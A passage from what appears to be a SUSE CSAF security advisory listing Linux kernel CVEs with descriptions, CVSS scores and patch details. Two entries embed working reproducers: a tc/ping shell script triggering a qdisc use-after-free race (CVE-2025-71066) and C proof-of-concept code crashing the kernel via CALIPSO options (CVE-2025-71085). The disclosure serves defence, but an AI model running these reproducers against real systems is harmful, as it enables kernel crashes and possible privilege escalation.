"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs: udf: fix OOB read in lengthAllocDescs handling\n\nWhen parsing Allocation Extent Descriptor, lengthAllocDescs comes from\non-disk data and must be validated against the block size. Crafted or\ncorrupted images may set lengthAllocDescs so that the total descriptor\nlength (sizeof(allocExtDesc) + lengthAllocDescs) exceeds the buffer,\nleading udf_update_tag() to call crc_itu_t() on out-of-bounds memory and\ntrigger a KASAN use-after-free read.\n\nBUG: KASAN: use-after-free in crc_itu_t+0x1d5/0x2b0 lib/crc-itu-t.c:60\nRead of size 1 at addr ffff888041e7d000 by task syz-executor317/5309\n\nCPU: 0 UID: 0 PID: 5309 Comm: syz-executor317 Not tainted 6.12.0-rc4-syzkaller-00261-g850925a8133c #0\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:94 [inline]\n dump_stack_lvl+0x241/0x360 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:377 [inline]\n print_report+0x169/0x550 mm/kasan/report.c:488\n kasan_report+0x143/0x180 mm/kasan/report.c:601\n crc_itu_t+0x1d5/0x2b0 lib/crc-itu-t.c:60\n udf_update_tag+0x70/0x6a0 fs/udf/misc.c:261\n udf_write_aext+0x4d8/0x7b0 fs/udf/inode.c:2179\n extent_trunc+0x2f7/0x4a0 fs/udf/truncate.c:46\n udf_truncate_tail_extent+0x527/0x7e0 fs/udf/truncate.c:106\n udf_release_file+0xc1/0x120 fs/udf/file.c:185\n __fput+0x23f/0x880 fs/file_table.c:431\n task_work_run+0x24f/0x310 kernel/task_work.c:239\n exit_task_work include/linux/task_work.h:43 [inline]\n do_exit+0xa2f/0x28e0 kernel/exit.c:939\n do_group_exit+0x207/0x2c0 kernel/exit.c:1088\n __do_sys_exit_group kernel/exit.c:1099 [inline]\n __se_sys_exit_group kernel/exit.c:1097 [inline]\n __x64_sys_exit_group+0x3f/0x40 kernel/exit.c:1097\n x64_sys_call+0x2634/0x2640 arch/x86/include/generated/asm/syscalls_64.h:232\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xf3/0x230 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n \u003c/TASK\u003e\n\nValidate the computed total length against epos-\u003ebh-\u003eb_size.\n\nFound by Linux Verification Center (linuxtesting.org) with Syzkaller.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40044",
"url": "https://www.suse.com/security/cve/CVE-2025-40044"
},
{
"category": "external",
"summary": "SUSE Bug 1252785 for CVE-2025-40044",
"url": "https://bugzilla.suse.com/1252785"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2025-40044"
},
{
"cve": "CVE-2025-40139",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40139"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmc: Use __sk_dst_get() and dst_dev_rcu() in in smc_clc_prfx_set().\n\nsmc_clc_prfx_set() is called during connect() and not under RCU\nnor RTNL.\n\nUsing sk_dst_get(sk)-\u003edev could trigger UAF.\n\nLet\u0027s use __sk_dst_get() and dev_dst_rcu() under rcu_read_lock()\nafter kernel_getsockname().\n\nNote that the returned value of smc_clc_prfx_set() is not used\nin the caller.\n\nWhile at it, we change the 1st arg of smc_clc_prfx_set[46]_rcu()\nnot to touch dst there.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40139",
"url": "https://www.suse.com/security/cve/CVE-2025-40139"
},
{
"category": "external",
"summary": "SUSE Bug 1253409 for CVE-2025-40139",
"url": "https://bugzilla.suse.com/1253409"
},
{
"category": "external",
"summary": "SUSE Bug 1253411 for CVE-2025-40139",
"url": "https://bugzilla.suse.com/1253411"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2025-40139"
},
{
"cve": "CVE-2025-40242",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40242"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngfs2: Fix unlikely race in gdlm_put_lock\n\nIn gdlm_put_lock(), there is a small window of time in which the\nDFL_UNMOUNT flag has been set but the lockspace hasn\u0027t been released,\nyet. In that window, dlm may still call gdlm_ast() and gdlm_bast().\nTo prevent it from dereferencing freed glock objects, only free the\nglock if the lockspace has actually been released.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40242",
"url": "https://www.suse.com/security/cve/CVE-2025-40242"
},
{
"category": "external",
"summary": "SUSE Bug 1255075 for CVE-2025-40242",
"url": "https://bugzilla.suse.com/1255075"
},
{
"category": "external",
"summary": "SUSE Bug 1255076 for CVE-2025-40242",
"url": "https://bugzilla.suse.com/1255076"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2025-40242"
},
{
"cve": "CVE-2025-68312",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68312"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusbnet: Prevents free active kevent\n\nThe root cause of this issue are:\n1. When probing the usbnet device, executing usbnet_link_change(dev, 0, 0);\nput the kevent work in global workqueue. However, the kevent has not yet\nbeen scheduled when the usbnet device is unregistered. Therefore, executing\nfree_netdev() results in the \"free active object (kevent)\" error reported\nhere.\n\n2. Another factor is that when calling usbnet_disconnect()-\u003eunregister_netdev(),\nif the usbnet device is up, ndo_stop() is executed to cancel the kevent.\nHowever, because the device is not up, ndo_stop() is not executed.\n\nThe solution to this problem is to cancel the kevent before executing\nfree_netdev().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68312",
"url": "https://www.suse.com/security/cve/CVE-2025-68312"
},
{
"category": "external",
"summary": "SUSE Bug 1255171 for CVE-2025-68312",
"url": "https://bugzilla.suse.com/1255171"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2025-68312"
},
{
"cve": "CVE-2025-71066",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71066"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Always remove class from active list before deleting in ets_qdisc_change\n\nzdi-disclosures@trendmicro.com says:\n\nThe vulnerability is a race condition between `ets_qdisc_dequeue` and\n`ets_qdisc_change`. It leads to UAF on `struct Qdisc` object.\nAttacker requires the capability to create new user and network namespace\nin order to trigger the bug.\nSee my additional commentary at the end of the analysis.\n\nAnalysis:\n\nstatic int ets_qdisc_change(struct Qdisc *sch, struct nlattr *opt,\n struct netlink_ext_ack *extack)\n{\n...\n\n // (1) this lock is preventing .change handler (`ets_qdisc_change`)\n //to race with .dequeue handler (`ets_qdisc_dequeue`)\n sch_tree_lock(sch);\n\n for (i = nbands; i \u003c oldbands; i++) {\n if (i \u003e= q-\u003enstrict \u0026\u0026 q-\u003eclasses[i].qdisc-\u003eq.qlen)\n list_del_init(\u0026q-\u003eclasses[i].alist);\n qdisc_purge_queue(q-\u003eclasses[i].qdisc);\n }\n\n WRITE_ONCE(q-\u003enbands, nbands);\n for (i = nstrict; i \u003c q-\u003enstrict; i++) {\n if (q-\u003eclasses[i].qdisc-\u003eq.qlen) {\n\t\t // (2) the class is added to the q-\u003eactive\n list_add_tail(\u0026q-\u003eclasses[i].alist, \u0026q-\u003eactive);\n q-\u003eclasses[i].deficit = quanta[i];\n }\n }\n WRITE_ONCE(q-\u003enstrict, nstrict);\n memcpy(q-\u003eprio2band, priomap, sizeof(priomap));\n\n for (i = 0; i \u003c q-\u003enbands; i++)\n WRITE_ONCE(q-\u003eclasses[i].quantum, quanta[i]);\n\n for (i = oldbands; i \u003c q-\u003enbands; i++) {\n q-\u003eclasses[i].qdisc = queues[i];\n if (q-\u003eclasses[i].qdisc != \u0026noop_qdisc)\n qdisc_hash_add(q-\u003eclasses[i].qdisc, true);\n }\n\n // (3) the qdisc is unlocked, now dequeue can be called in parallel\n // to the rest of .change handler\n sch_tree_unlock(sch);\n\n ets_offload_change(sch);\n for (i = q-\u003enbands; i \u003c oldbands; i++) {\n\t // (4) we\u0027re reducing the refcount for our class\u0027s qdisc and\n\t // freeing it\n qdisc_put(q-\u003eclasses[i].qdisc);\n\t // (5) If we call .dequeue between (4) and (5), we will have\n\t // a strong UAF and we can control RIP\n q-\u003eclasses[i].qdisc = NULL;\n WRITE_ONCE(q-\u003eclasses[i].quantum, 0);\n q-\u003eclasses[i].deficit = 0;\n gnet_stats_basic_sync_init(\u0026q-\u003eclasses[i].bstats);\n memset(\u0026q-\u003eclasses[i].qstats, 0, sizeof(q-\u003eclasses[i].qstats));\n }\n return 0;\n}\n\nComment:\nThis happens because some of the classes have their qdiscs assigned to\nNULL, but remain in the active list. This commit fixes this issue by always\nremoving the class from the active list before deleting and freeing its\nassociated qdisc\n\nReproducer Steps\n(trimmed version of what was sent by zdi-disclosures@trendmicro.com)\n\n```\nDEV=\"${DEV:-lo}\"\nROOT_HANDLE=\"${ROOT_HANDLE:-1:}\"\nBAND2_HANDLE=\"${BAND2_HANDLE:-20:}\" # child under 1:2\nPING_BYTES=\"${PING_BYTES:-48}\"\nPING_COUNT=\"${PING_COUNT:-200000}\"\nPING_DST=\"${PING_DST:-127.0.0.1}\"\n\nSLOW_TBF_RATE=\"${SLOW_TBF_RATE:-8bit}\"\nSLOW_TBF_BURST=\"${SLOW_TBF_BURST:-100b}\"\nSLOW_TBF_LAT=\"${SLOW_TBF_LAT:-1s}\"\n\ncleanup() {\n tc qdisc del dev \"$DEV\" root 2\u003e/dev/null\n}\ntrap cleanup EXIT\n\nip link set \"$DEV\" up\n\ntc qdisc del dev \"$DEV\" root 2\u003e/dev/null || true\n\ntc qdisc add dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\n\ntc qdisc add dev \"$DEV\" parent 1:2 handle \"$BAND2_HANDLE\" \\\n tbf rate \"$SLOW_TBF_RATE\" burst \"$SLOW_TBF_BURST\" latency \"$SLOW_TBF_LAT\"\n\ntc filter add dev \"$DEV\" parent 1: protocol all prio 1 u32 match u32 0 0 flowid 1:2\ntc -s qdisc ls dev $DEV\n\nping -I \"$DEV\" -f -c \"$PING_COUNT\" -s \"$PING_BYTES\" -W 0.001 \"$PING_DST\" \\\n \u003e/dev/null 2\u003e\u00261 \u0026\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 0\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\ntc -s qdisc ls dev $DEV\ntc qdisc del dev \"$DEV\" parent \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71066",
"url": "https://www.suse.com/security/cve/CVE-2025-71066"
},
{
"category": "external",
"summary": "SUSE Bug 1256645 for CVE-2025-71066",
"url": "https://bugzilla.suse.com/1256645"
},
{
"category": "external",
"summary": "SUSE Bug 1258005 for CVE-2025-71066",
"url": "https://bugzilla.suse.com/1258005"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2025-71066"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
},
{
"cve": "CVE-2025-71112",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71112"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: add VLAN id validation before using\n\nCurrently, the VLAN id may be used without validation when\nreceive a VLAN configuration mailbox from VF. The length of\nvlan_del_fail_bmap is BITS_TO_LONGS(VLAN_N_VID). It may cause\nout-of-bounds memory access once the VLAN id is bigger than\nor equal to VLAN_N_VID.\n\nTherefore, VLAN id needs to be checked to ensure it is within\nthe range of VLAN_N_VID.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71112",
"url": "https://www.suse.com/security/cve/CVE-2025-71112"
},
{
"category": "external",
"summary": "SUSE Bug 1256726 for CVE-2025-71112",
"url": "https://bugzilla.suse.com/1256726"
},
{
"category": "external",
"summary": "SUSE Bug 1256727 for CVE-2025-71112",
"url": "https://bugzilla.suse.com/1256727"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2025-71112"
},
{
"cve": "CVE-2026-22999",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22999"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_qfq: do not free existing class in qfq_change_class()\n\nFixes qfq_change_class() error case.\n\ncl-\u003eqdisc and cl should only be freed if a new class and qdisc\nwere allocated, or we risk various UAF.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22999",
"url": "https://www.suse.com/security/cve/CVE-2026-22999"
},
{
"category": "external",
"summary": "SUSE Bug 1257236 for CVE-2026-22999",
"url": "https://bugzilla.suse.com/1257236"
},
{
"category": "external",
"summary": "SUSE Bug 1257238 for CVE-2026-22999",
"url": "https://bugzilla.suse.com/1257238"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
